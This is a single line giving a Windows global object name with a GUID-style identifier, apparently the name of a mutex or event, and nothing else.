Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}